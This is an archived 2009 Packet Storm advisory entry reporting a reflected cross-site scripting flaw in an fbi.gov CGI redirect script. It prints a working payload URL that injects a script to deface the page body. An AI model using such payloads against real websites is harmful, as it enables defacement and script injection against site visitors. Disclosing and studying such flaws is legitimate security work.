FBI.gov Cross SIte Scripting

2009-01-20T00:00:00
ID PACKETSTORM:74121
Type packetstorm
Reporter Matrix
Modified 2009-01-20T00:00:00

Description

                                        
                                            `by : Matrix (S.B)  
  
Ok it is not the first time, but they had fixed them all. It will probably be the third or fourth time they try to address this damn cgi! Here is the XSS that Matrix submitted to Securityfocus (works only in Internet Explorer):  
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'Matrix(S.B)'</script>  
`